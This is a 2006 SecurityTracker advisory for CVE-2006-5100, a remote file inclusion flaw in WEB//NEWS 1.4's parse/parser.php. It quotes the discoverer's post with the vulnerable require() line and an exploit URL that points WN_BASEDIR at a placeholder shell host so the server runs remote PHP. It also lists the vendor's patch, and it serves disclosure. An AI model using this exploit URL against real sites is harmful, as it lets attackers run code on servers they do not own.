WEB//NEWS Include File Flaw in 'parse/parser.php' Lets Remote Users Execute Arbitrary Code
|
SecurityTracker Alert ID: 1016938 |
SecurityTracker URL: http://securitytracker.com/id/1016938
|
CVE Reference:
CVE-2006-5100
(Links to External Site)
|
Updated: Jun 3 2008
|
Original Entry Date: Sep 27 2006
|
Impact:
Execution of arbitrary code via network, User access via network
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 1.4 prior to Build 26092006-01
|
Description:
ThE-WoLf-KsA reported a vulnerability in WEB//NEWS. A remote user can execute arbitrary code on the target system.
The 'parse/parser.php' script does not properly validate user-supplied input in the 'WN_BASEDIR' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
htpp://[target]/[scriptPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM
|
Impact:
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution:
The vendor has issued a fixed version (Version 1.4 Build 26092006-01).
Also, a patch (1.4 security patch 2) is available at:
http://www.stylemotion.de/downloads-id3-web-news-1-4-sicherheits-patch-2.html
The stylemotion.de advisory is available at:
http://www.stylemotion.de/forum/thread-1978-1-sicherheitspatch.html
|
Vendor URL: www.stylemotion.de/webnews.html (Links to External Site)
|
Cause:
Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
|
#==============================================================================================
#webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#
#
#Version : v1.4
#
#================================================================================================
#Bug in : parse/parser.php
#
#Vlu Code :
#--------------------------------
#
# require($WN_BASEDIR."/parse/parser.php");
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#htpp://sitename.com[scerpitPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : ThE-WoLf-KsA
#
#Conatact : the-wolf-ksa[at]hotmail.com
#XP10_hackEr Team
#
#WWW.XP10.COM
==================================================================================================
vendor:
http://www.stylemotion.de/downloads-id1-web-news-1-4.html
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
|
|